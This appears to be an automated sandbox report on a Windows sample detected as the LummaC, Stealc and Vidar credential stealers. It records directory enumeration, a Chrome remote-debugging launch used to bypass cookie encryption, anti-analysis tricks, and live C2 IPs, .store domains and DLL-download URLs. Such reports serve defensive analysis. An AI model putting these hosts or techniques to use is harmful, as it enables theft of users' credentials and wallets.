Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: number of queries: 1294
Yara detected Credential Stealer
Source: Yara match File source: 0000001A.00000003.2852160535.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2878148913.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3014928188.0000000005E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2875540719.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2862807328.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 28d9ab8742.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 28d9ab8742.exe PID: 7408, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 28d9ab8742.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 28d9ab8742.exe PID: 7408, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000021.00000003.2999328469.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.3247798892.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3090234093.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2881702630.0000000000911000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.2841341620.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3026569663.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2122615907.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3031855893.0000000005E01000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2882880413.000000000146E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3087960505.0000000000911000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2492153777.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3289871087.000000000153B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2983198162.0000000008270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2489334528.00000000001A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3288030820.0000000000911000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 28d9ab8742.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3daf81f16e.exe PID: 2724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3daf81f16e.exe PID: 9140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3daf81f16e.exe PID: 6076, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 28d9ab8742.exe PID: 4068, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCC0C40 sqlite3_bind_zeroblob, 0_2_6CCC0C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCC0D60 sqlite3_bind_parameter_name, 0_2_6CCC0D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE8EA0 sqlite3_clear_bindings, 0_2_6CBE8EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCC0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6CCC0B40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE6410 bind,WSAGetLastError, 0_2_6CBE6410
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE60B0 listen,WSAGetLastError, 0_2_6CBE60B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBEC030 sqlite3_bind_parameter_count, 0_2_6CBEC030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE6070 PR_Listen, 0_2_6CBE6070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBEC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 0_2_6CBEC050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB722D0 sqlite3_bind_blob, 0_2_6CB722D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE63C0 PR_Bind, 0_2_6CBE63C0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553576 Sample: file.exe Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 81 scriptyprefej.store 2->81 83 thumbystriw.store 2->83 85 8 other IPs or domains 2->85 115 Suricata IDS alerts for network traffic 2->115 117 Found malware configuration 2->117 119 Antivirus detection for URL or domain 2->119 121 14 other signatures 2->121 9 skotes.exe 2->9         started        14 file.exe 37 2->14         started        16 28d9ab8742.exe 2->16         started        18 6 other processes 2->18 signatures3 process4 dnsIp5 101 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 9->101 59 C:\Users\user\AppData\...\be33d1b9ea.exe, PE32 9->59 dropped 61 C:\Users\user\AppData\...\3daf81f16e.exe, PE32 9->61 dropped 63 C:\Users\user\AppData\...\28d9ab8742.exe, PE32 9->63 dropped 71 2 other malicious files 9->71 dropped 163 Creates multiple autostart registry keys 9->163 165 Hides threads from debuggers 9->165 167 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->167 20 be33d1b9ea.exe 9->20         started        23 28d9ab8742.exe 9->23         started        26 3daf81f16e.exe 9->26         started        28 skotes.exe 9->28         started        103 185.215.113.206, 49709, 49755, 49827 WHOLESALECONNECTIONSNL Portugal 14->103 105 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 14->105 107 127.0.0.1 unknown unknown 14->107 65 C:\Users\user\DocumentsECBGHCGCBK.exe, PE32 14->65 dropped 67 C:\Users\user\AppData\...\softokn3[1].dll, PE32 14->67 dropped 69 C:\Users\user\AppData\Local\...\random[1].exe, PE32 14->69 dropped 73 11 other files (3 malicious) 14->73 dropped 169 Detected unpacking (changes PE section rights) 14->169 171 Attempt to bypass Chrome Application-Bound Encryption 14->171 173 Drops PE files to the document folder of the user 14->173 185 7 other signatures 14->185 30 cmd.exe 14->30         started        32 msedge.exe 2 10 14->32         started        34 chrome.exe 14->34         started        175 Query firmware table information (likely to detect VMs) 16->175 177 Tries to harvest and steal ftp login credentials 16->177 179 Tries to harvest and steal browser information (history, passwords, etc) 16->179 109 23.192.247.89 AKAMAI-ASUS United States 18->109 111 192.168.2.16 unknown unknown 18->111 113 4 other IPs or domains 18->113 181 Maps a DLL or memory area into another process 18->181 183 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->183 36 msedge.exe 18->36         started        39 7 other processes 18->39 file6 signatures7 process8 dnsIp9 123 Multi AV Scanner detection for dropped file 20->123 125 Detected unpacking (changes PE section rights) 20->125 127 Tries to detect sandboxes and other dynamic analysis tools (window names) 20->127 143 4 other signatures 20->143 87 marshal-zhukov.com 188.114.97.3 CLOUDFLARENETUS European Union 23->87 89 steamcommunity.com 23.50.98.133 AKAMAI-ASUS United States 23->89 129 Query firmware table information (likely to detect VMs) 23->129 131 Tries to evade debugger and weak emulator (self modifying code) 23->131 133 Tries to steal Crypto Currency Wallets 23->133 145 2 other signatures 23->145 135 Hides threads from debuggers 26->135 137 Tries to detect sandboxes / dynamic malware analysis system (registry check) 26->137 139 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 26->139 41 DocumentsECBGHCGCBK.exe 30->41         started        45 conhost.exe 30->45         started        141 Monitors registry run keys for changes 32->141 47 msedge.exe 32->47         started        91 192.168.2.6, 443, 49706, 49707 unknown unknown 34->91 93 239.255.255.250 unknown Reserved 34->93 49 chrome.exe 34->49         started        95 13.107.246.40, 443, 49860, 49872 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 36->95 97 20.110.205.119, 443, 49879, 49920 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 36->97 99 24 other IPs or domains 36->99 55 C:\Users\user\AppData\Local\...\Cookies, SQLite 36->55 dropped file10 signatures11 process12 dnsIp13 57 C:\Users\user\AppData\Local\...\skotes.exe, PE32 41->57 dropped 155 Detected unpacking (changes PE section rights) 41->155 157 Tries to evade debugger and weak emulator (self modifying code) 41->157 159 Tries to detect virtualization through RDTSC time measurements 41->159 161 3 other signatures 41->161 52 skotes.exe 41->52         started        75 play.google.com 142.250.181.238, 443, 49741, 49764 GOOGLEUS United States 49->75 77 www.google.com 142.250.185.100, 443, 49716, 49717 GOOGLEUS United States 49->77 79 2 other IPs or domains 49->79 file14 signatures15 process16 signatures17 147 Detected unpacking (changes PE section rights) 52->147 149 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 52->149 151 Tries to evade debugger and weak emulator (self modifying code) 52->151 153 3 other signatures 52->153
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
13.107.246.40
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
142.250.185.100
 www.google.com United States
15169 GOOGLEUS false
23.192.247.89
 unknown United States
16625 AKAMAI-ASUS true
162.159.61.3
 chrome.cloudflare-dns.com United States
13335 CLOUDFLARENETUS false
23.219.161.135
 unknown United States
20940 AKAMAI-ASN1EU false
23.209.72.39
 unknown United States
20940 AKAMAI-ASN1EU false
23.33.40.143
 unknown United States
20940 AKAMAI-ASN1EU false
20.110.205.119
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
23.33.40.146
 unknown United States
20940 AKAMAI-ASN1EU false
18.244.18.32
 sb.scorecardresearch.com United States
16509 AMAZON-02US false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
239.255.255.250
 unknown Reserved
unknown unknown false
188.114.97.3
 marshal-zhukov.com European Union
13335 CLOUDFLARENETUS false
20.96.153.111
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
104.117.182.56
 unknown United States
20940 AKAMAI-ASN1EU false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.185.206
 plus.l.google.com United States
15169 GOOGLEUS false
216.58.206.33
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
18.238.49.99
 unknown United States
16509 AMAZON-02US false
142.250.181.238
 play.google.com United States
15169 GOOGLEUS false
40.79.167.8
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
204.79.197.219
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
172.64.41.3
 unknown United States
13335 CLOUDFLARENETUS false
94.245.104.56
 ssl.bingadsedgeextension-prod-europe.azurewebsites.net United Kingdom
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
23.50.98.133
 steamcommunity.com United States
16625 AKAMAI-ASUS false

Private

IP
192.168.2.8
192.168.2.9
192.168.2.4
192.168.2.6
127.0.0.1
192.168.2.17
192.168.2.16

Contacted Domains

Name IP Active
chrome.cloudflare-dns.com 162.159.61.3 true
steamcommunity.com 23.50.98.133 true
plus.l.google.com 142.250.185.206 true
play.google.com 142.250.181.238 true
ssl.bingadsedgeextension-prod-europe.azurewebsites.net 94.245.104.56 true
sb.scorecardresearch.com 18.244.18.32 true
www.google.com 142.250.185.100 true
marshal-zhukov.com 188.114.97.3 true
googlehosted.l.googleusercontent.com 216.58.206.33 true
sni1gl.wpc.nucdn.net 152.199.21.175 true
assets.msn.com unknown unknown
c.msn.com unknown unknown
ntp.msn.com unknown unknown
assets2.msn.com unknown unknown
navygenerayk.store unknown unknown
clients2.googleusercontent.com unknown unknown
bzib.nelreports.net unknown unknown
presticitpo.store unknown unknown
founpiuer.store unknown unknown
scriptyprefej.store unknown unknown
thumbystriw.store unknown unknown
necklacedmny.store unknown unknown
apis.google.com unknown unknown
api.msn.com unknown unknown
crisiwarny.store unknown unknown
fadehairucw.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    fadehairucw.store false
      		high
      https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731325230045&w=0&anoncknm=app_anon&NoResponseBody=true false
        		high
        http://185.215.113.206/68b591d6548ec281/nss3.dll false
          		high
          founpiuer.store false
            		high
            185.215.113.206/c4becf79229cb002.php false
              		high
              https://steamcommunity.com/profiles/76561199724331900 false
                		high
                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731325229335&w=0&anoncknm=app_anon&NoResponseBody=true false
                  		high
                  https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 false
                    		high
                    http://185.215.113.206/68b591d6548ec281/vcruntime140.dll false
                      		high
                      presticitpo.store false
                        		high
                        http://185.215.113.206/68b591d6548ec281/sqlite3.dll false
                          		high
                          https://sb.scorecardresearch.com/b2?rn=1731325227261&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1817CCD1391B64C11978D9E5387965A3&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null false
                            		high